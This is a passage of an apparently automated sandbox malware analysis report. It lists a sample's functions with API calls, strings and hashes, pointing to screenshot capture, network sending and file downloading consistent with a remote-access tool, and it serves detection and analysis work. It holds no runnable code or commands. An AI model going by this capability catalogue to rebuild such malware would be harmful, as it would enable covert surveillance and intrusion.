                                              • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                              Function 0044569C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 1635606685-2435473048
                                              • Opcode ID: f0de9a60e357a1a516712e43babba682c551c118595bd7d83414f195bca2d99c
                                              • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                              • Opcode Fuzzy Hash: f0de9a60e357a1a516712e43babba682c551c118595bd7d83414f195bca2d99c
                                              • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                              Function 004187AA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: GdiplusStartupconnectsend
                                              • String ID: ,aF$NG
                                              • API String ID: 1957403310-2168067942
                                              • Opcode ID: 9cccb7b0bfc2cac53569108e4f26632b701b6f2e9fee152654bfbd7a88a4ba82
                                              • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                              • Opcode Fuzzy Hash: 9cccb7b0bfc2cac53569108e4f26632b701b6f2e9fee152654bfbd7a88a4ba82
                                              • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                              Function 0044EE44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Info
                                              • String ID: $v%(/
                                              • API String ID: 1807457897-360872775
                                              • Opcode ID: 049d1e884d4a1415b50025a45b902bc53cedd3f2c6abddabc7966785a218a195
                                              • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                              • Opcode Fuzzy Hash: 049d1e884d4a1415b50025a45b902bc53cedd3f2c6abddabc7966785a218a195
                                              • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                              Function 00442559 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004425A0
                                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00442620
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: v%(/
                                              • API String ID: 1834446548-2435473048
                                              • Opcode ID: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                              • Instruction ID: 27c6b2887722bd8dd8fc110c7074932bdcd8c9000dde826a4c26c38167b381c7
                                              • Opcode Fuzzy Hash: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                              • Instruction Fuzzy Hash: 6341E831A00158ABEB20DF14CE80BE977B5EB48304F5585EAF54997241EBB9DDC2CF98
                                              Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                              • String ID: image/jpeg
                                              • API String ID: 1291196975-3785015651
                                              • Opcode ID: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                              • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                              • Opcode Fuzzy Hash: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                              • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                              Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                              • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                              • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                              • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                              Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                              • GetLastError.KERNEL32(?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B884
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: v%(/
                                              • API String ID: 442123175-2435473048
                                              • Opcode ID: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                              • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                              • Opcode Fuzzy Hash: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                              • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                              Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                              • GetLastError.KERNEL32(?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B796
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: v%(/
                                              • API String ID: 442123175-2435473048
                                              • Opcode ID: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                              • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                              • Opcode Fuzzy Hash: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                              • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                              Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                              • String ID: image/png
                                              • API String ID: 1291196975-2966254431
                                              • Opcode ID: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                              • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                              • Opcode Fuzzy Hash: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                              • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                              Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-1507639952
                                              • Opcode ID: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                              • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                              • Opcode Fuzzy Hash: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                              • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                              Function 0044854A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc__crt_fast_encode_pointer
                                              • String ID: v%(/
                                              • API String ID: 2279764990-2435473048
                                              • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                              • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                              • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                              • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                              Function 00443487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _abort
                                              • String ID: v%($v%(/
                                              • API String ID: 1888311480-2825822838
                                              • Opcode ID: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                              • Instruction ID: 3fe02070f8d2a70cab432f83213559668c8dc8cd07ffd2e3f30c78975cd7cd62
                                              • Opcode Fuzzy Hash: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                              • Instruction Fuzzy Hash: CD113A326207049BEB14AF79EC06B4D7790AB00B20F15402BF90D9B2C2DBB89C408A8C
                                              Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32 ref: 0041667B
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadFileSleep
                                              • String ID: !D@
                                              • API String ID: 1931167962-604454484
                                              • Opcode ID: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
                                              • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                              • Opcode Fuzzy Hash: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
                                              • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                              Function 0043502B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043506F
                                              • ___raise_securityfailure.LIBCMT ref: 00435156
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: v%(/
                                              • API String ID: 3761405300-2435473048
                                              • Opcode ID: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                              • Instruction ID: c499df361ad1c1a9c93393a24c16d6e92e8df025d99686d048565dfc03b89b9f
                                              • Opcode Fuzzy Hash: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                              • Instruction Fuzzy Hash: ED21EDB9520200DBD724DF1DE992A843BA4FB08354F10503AED0C8B7B0E3B569C08F8D
                                              Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                              • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                              • Opcode Fuzzy Hash: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                              • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                              Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: alarm.wav$hYG
                                              • API String ID: 1174141254-2782910960
                                              • Opcode ID: 36777b58f562ae880fe065173d7388d0cb1aec3caf481dd9519d79c18cec9ee7
                                              • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                              • Opcode Fuzzy Hash: 36777b58f562ae880fe065173d7388d0cb1aec3caf481dd9519d79c18cec9ee7
